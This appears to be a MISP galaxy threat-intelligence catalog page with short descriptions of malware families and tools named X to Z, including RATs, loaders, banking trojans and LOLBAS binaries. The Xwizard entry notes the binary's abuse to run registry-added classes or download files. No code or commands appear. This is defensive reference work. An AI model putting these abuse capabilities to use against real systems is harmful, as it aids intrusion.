tags | ['4a457eb3-e404-47e5-b349-8b1f743dc657', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Xloader (macOS Variant)
Researchers discovered an updated macOS variant of the XLoader stealer/botnet malware, which is programmed in C and Objective C and signed with an Apple developer signature.[SentinelOne 8 21 2023]
Internal MISP references
UUID 5ced31ef-8e03-4125-be9b-922dac49bfa2
which can be used as unique global reference for Xloader (macOS Variant)
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS'] |
software_attack_id | S5317 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
XMRig
XMRig is an open-source tool that uses the resources of the running system to mine Monero cryptocurrency. According to U.S. cybersecurity authorities, "XMRig can cause a victim computer to overheat and perform poorly by using additional system resources that would otherwise not be active".[U.S. CISA Trends June 30 2020]
Internal MISP references
UUID 1491c020-6449-48e7-8ebf-abf7b71fbc97
which can be used as unique global reference for XMRig
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5064 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '291c006e-f77a-4c9c-ae7e-084974c0e1eb', '4fa6f8e1-b0d5-4169-8038-33e355c08bde', 'efa33611-88a5-40ba-9bc4-3d85c6c8819b', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Xpack
According to joint Cybersecurity Advisory AA23-250A (September 2023), Xpack is a malicious, "custom .NET loader that decrypts (AES), loads, and executes accompanying files".[U.S. CISA Zoho Exploits September 7 2023]
Internal MISP references
UUID 19e7e967-7d0a-4930-8ef9-11a43dcb081d
which can be used as unique global reference for Xpack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5048 |
source | Tidal Cyber |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
XTunnel
XTunnel is a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and was reportedly used by APT28 during the compromise of the Democratic National Committee. [Crowdstrike DNC June 2016] [Invincea XTunnel] [ESET Sednit Part 2]
Internal MISP references
UUID 133136f0-7254-4cec-8710-0ab99d5da4e5
which can be used as unique global reference for XTunnel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0117 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Xwizard
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe
Author: Oddvar Moe
Paths: * C:\Windows\System32\xwizard.exe * C:\Windows\SysWOW64\xwizard.exe
Resources: * http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ * https://www.youtube.com/watch?v=LwDHX7DVHWU * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 * https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ * https://twitter.com/notwhickey/status/1306023056847110144
Detection: * Sigma: proc_creation_win_lolbin_class_exec_xwizard.yml * Sigma: proc_creation_win_lolbin_dll_sideload_xwizard.yml * Elastic: execution_com_object_xwizard.toml * Elastic: defense_evasion_unusual_process_network_connection.toml[Xwizard.exe - LOLBAS Project]
Internal MISP references
UUID d5663ff2-904b-42d6-b4d8-672017d91de2
which can be used as unique global reference for Xwizard
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5181 |
source | Tidal Cyber |
tags | ['c37d2f5f-91da-43c6-869e-192bf0e0ae90', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Xworm
XWorm is a Remote Access Trojan (RAT)/Backdoor malware.
Internal MISP references
UUID 15a19d45-8f31-4ee4-ba01-0c8c1f24a67b
which can be used as unique global reference for Xworm
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5290 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
YAHOYAH
YAHOYAH is a Trojan used by Tropic Trooper as a second-stage backdoor.[TrendMicro TropicTrooper 2015]
Internal MISP references
UUID 0844bc42-5c29-47c3-b1b3-6bfffbf1732a
which can be used as unique global reference for YAHOYAH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0388 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
YouieLoad
YouieLoad is an intermediate-stage malware used by the North Korean threat actor Moonstone Sleet mainly for payload execution purposes. It is also capable of performing system reconnaissance.[Microsoft Security Blog 5 28 2024]
Internal MISP references
UUID 2992159c-d71c-48cf-8302-020f90332390
which can be used as unique global reference for YouieLoad
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5323 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '84615fe0-c2a5-4e07-8957-78ebc29b4635', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
yty
yty is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. [ASERT Donot March 2018]
Internal MISP references
UUID e0962ff7-5524-4683-9b95-0e4ba07dccb2
which can be used as unique global reference for yty
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0248 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Zebrocy
Zebrocy is a Trojan that has been used by APT28 since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. [Palo Alto Sofacy 06-2018][Unit42 Cannon Nov 2018][Unit42 Sofacy Dec 2018][CISA Zebrocy Oct 2020]
Internal MISP references
UUID e317b8a6-1722-4017-be33-717a5a93ef1c
which can be used as unique global reference for Zebrocy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0251 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Zeroaccess
Zeroaccess is a kernel-mode Rootkit that attempts to add victims to the ZeroAccess botnet, often for monetary gain. [Sophos ZeroAccess]
Internal MISP references
UUID 2f52b513-5293-4833-9c4d-b120e7a84341
which can be used as unique global reference for Zeroaccess
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0027 |
source | MITRE |
type | ['malware'] |
ZeroT
ZeroT is a Trojan used by TA459, often in conjunction with PlugX. [Proofpoint TA459 April 2017] [Proofpoint ZeroT Feb 2017]
Internal MISP references
UUID f51df90e-ea1b-4eeb-9aff-ec5abf4a5dfd
which can be used as unique global reference for ZeroT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0230 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Zeus Panda
Zeus Panda is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. Zeus Panda’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.[Talos Zeus Panda Nov 2017][GDATA Zeus Panda June 2017]
Internal MISP references
UUID be8add13-40d7-495e-91eb-258d3a4711bc
which can be used as unique global reference for Zeus Panda
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0330 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['malware'] |
Zipfldr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Compressed Folder library
Author: LOLBAS Team
Paths:
* c:\windows\system32\zipfldr.dll
* c:\windows\syswow64\zipfldr.dll
Resources:
* https://twitter.com/moriarty_meng/status/977848311603380224
* https://twitter.com/bohops/status/997896811904929792
* https://windows10dll.nirsoft.net/zipfldr_dll.html
Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml [Zipfldr.dll - LOLBAS Project]
Internal MISP references
UUID 34d0c5b5-f6e1-41e9-9061-cf9d36fe61c8
which can be used as unique global reference for Zipfldr
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5201 |
source | Tidal Cyber |
tags | ['0d0098b4-e159-4502-973d-714011ba605f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ZIPLINE
ZIPLINE is a passive backdoor that was used during Cutting Edge on compromised Secure Connect VPNs for reverse shell and proxy functionality.[Mandiant Cutting Edge January 2024]
Internal MISP references
UUID 976a7797-3008-5316-9e28-19c9a05959d0
which can be used as unique global reference for ZIPLINE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1114 |
source | MITRE |
type | ['malware'] |
ZLib
ZLib is a full-featured backdoor that was used as a second-stage implant during Operation Dust Storm since at least 2014. ZLib is malware and should not be confused with the legitimate compression library from which its name is derived.[Cylance Dust Storm]
Internal MISP references
UUID 1ac8d363-2903-43da-9c1d-2b28179638c8
which can be used as unique global reference for ZLib
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0086 |
source | MITRE |
type | ['malware'] |
Zloader
Zloader originated in 2016 as a modular banking trojan based on the popular Zeus malware. It has evolved in the years since to be used as an important distribution mechanism for various other malware, including ransomware.[WeLiveSecurity April 19 2022]
This object represents a collection of MITRE ATT&CK® Techniques associated with Zloader binaries. Techniques used by various actors to distribute Zloader can be found in the separate "Zloader Threat Actors" Group object.
Internal MISP references
UUID a106fb66-bd68-40cc-9374-8b59234a0cec
which can be used as unique global reference for Zloader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5312 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '39357cc1-dbb1-49e4-9fe0-ff24032b94d5', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Zox
Zox is a remote access tool that has been used by Axiom since at least 2008.[Novetta-Axiom]
Internal MISP references
UUID 75dd9acb-fcff-4b0b-b45b-f943fb589d78
which can be used as unique global reference for Zox
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0672 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
zwShell
zwShell is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during Night Dragon.[McAfee Night Dragon]
Internal MISP references
UUID 49314d4e-dc04-456f-918e-a3bedfc3192a
which can be used as unique global reference for zwShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0350 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
ZxShell
ZxShell is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.[FireEye APT41 Aug 2019][Talos ZxShell Oct 2014]
Internal MISP references
UUID eea89ff2-036d-4fa6-bbed-f89502c62318
which can be used as unique global reference for ZxShell
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0412 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ZxxZ
ZxxZ is a trojan written in Visual C++ that has been used by BITTER since at least August 2021, including against Bangladeshi government personnel.[Cisco Talos Bitter Bangladesh May 2022]
Internal MISP references
UUID 91e1ee26-d6ae-4203-a466-93c9e5019b47
which can be used as unique global reference for ZxxZ
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1013 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.